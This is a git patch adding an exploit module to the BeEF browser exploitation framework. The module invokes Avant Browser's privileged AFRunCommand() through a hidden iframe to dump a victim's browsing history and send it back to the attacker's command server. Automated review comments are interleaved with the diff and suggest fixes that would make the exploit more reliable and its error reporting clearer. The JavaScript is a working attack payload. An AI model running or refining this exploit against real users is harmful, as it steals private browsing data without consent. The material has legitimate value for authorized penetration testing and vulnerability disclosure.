From 9546e881134119ae3d6413d59fa378ed2f6f455a Mon Sep 17 00:00:00 2001
From: Roberto Suggi Liverani
Date: Wed, 28 Nov 2012 14:11:04 +1300
Subject: [PATCH] Avant Browser History Stealing
Avant Browser History Stealing module - Advisory: http://blog.malerisch.net/2012/11/avant-browser-same-of-origin-policy.html
---
 .../exploits/avant_steal_history/command.js | 51 +++++++++++++++++++
 .../exploits/avant_steal_history/config.yaml | 25 +++++++++
 .../exploits/avant_steal_history/module.rb | 33 ++++++++++++
 3 files changed, 109 insertions(+)
 create mode 100644 modules/exploits/avant_steal_history/command.js
 create mode 100644 modules/exploits/avant_steal_history/config.yaml
 create mode 100644 modules/exploits/avant_steal_history/module.rb
diff --git a/modules/exploits/avant_steal_history/command.js b/modules/exploits/avant_steal_history/command.js
new file mode 100644
index 000000000..6eb89b905
--- /dev/null
+++ b/modules/exploits/avant_steal_history/command.js
@@ -0,0 +1,51 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+
+
+ var avant_iframe = document.createElement("iframe");
+ //var avant_iframe = beef.dom.createInvisibleIframe();
+ avant_iframe.setAttribute('src', "browser:home");
+ avant_iframe.setAttribute('name','test2');
+ avant_iframe.setAttribute('width','0');
+ avant_iframe.setAttribute('heigth','0');
+ avant_iframe.setAttribute('scrolling','no');
+
+ document.body.appendChild(avant_iframe);
+
+ var vstr = {value: ""};
+
+ if(window['test2'].navigator) {
+ //This works if FF is the rendering engine
+ window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value);
+
+ }
+ else {
+ // this works if Chrome is the rendering engine
+ //window['test2'].AFRunCommand(60003, vstr);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox");
+
+ }
+
+
+
+
+
+
+});
+
diff --git a/modules/exploits/avant_steal_history/config.yaml b/modules/exploits/avant_steal_history/config.yaml
new file mode 100644
index 000000000..1121f0db2
--- /dev/null
+++ b/modules/exploits/avant_steal_history/config.yaml
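Review bot: The attribute name in `avant_iframe.setAttribute('heigth','0');` is misspelled, so that call sets a meaningless attribute and has no effect; the intended line is `avant_iframe.setAttribute('height','0');`. The `<%= @cId %>` option value is rendered unquoted into the `AFRunCommand(...)` call, so a non-numeric entry in the module's textarea produces a syntax error in the injected script and, because there is no try/catch around the frame access, neither that case nor a missing `window['test2']` ever reaches `beef.net.send`, leaving the operator with no result at all; wrapping the frame access in a try/catch that reports the error text to the command URL would make both failures visible. The else branch claims the rendering engine is not Firefox, but the condition only tests that `window['test2'].navigator` is truthy, which presumably does not distinguish engines by itself — the message should say what was actually checked. The commented-out `createInvisibleIframe()` and `AFRunCommand(60003, vstr)` lines are dead code and should be dropped, and the six trailing blank lines before `});` add nothing.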
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ avant_steal_history:
+ enable: true
+ category: ["Exploits", "XSS"]
+ name: "Avant Browser History Stealing"
+ description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history."
+ authors: ["Roberto Suggi Liverani"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/avant_steal_history/module.rb b/modules/exploits/avant_steal_history/module.rb
new file mode 100644
index 000000000..7a819fa5e
--- /dev/null
+++ b/modules/exploits/avant_steal_history/module.rb
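Review bot: `working: ["ALL"]` declares the module as working on every browser, while command.js in the same commit reports "Exploit failed" unless the frame's navigator object is available and the description itself ties the module to Avant's `AFRunCommand()` function, so the target block overstates the module's applicability. Narrow the target to the engine the command actually supports (presumably the Firefox engine running inside Avant — confirm which BeEF target key expresses that), or at minimum extend the description, e.g. `description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history. Requires Avant with the Firefox rendering engine selected."`.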
@@ -0,0 +1,33 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Avant_steal_history < BeEF::Core::Command
+
+ def self.options
+
+ configuration = BeEF::Core::Configuration.instance
+
+
+ return [
+ {'name' => 'cId', 'ui_label' => 'Command ID:', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
+ ]
+
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
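Review bot: `configuration = BeEF::Core::Configuration.instance` in `self.options` is assigned and never read; the line should be removed. The `cId` option is exposed as a free-text textarea even though the command template (command.js in this commit) splices it unquoted into a JavaScript call, so the module should coerce or validate the value as an integer before the template is rendered (in whichever hook this class uses for that) rather than passing the raw string through — a plain text field sized for a number would also fit better than a 400x25 textarea. The explicit `return` before the array literal is unidiomatic Ruby; the array can simply be the method's last expression.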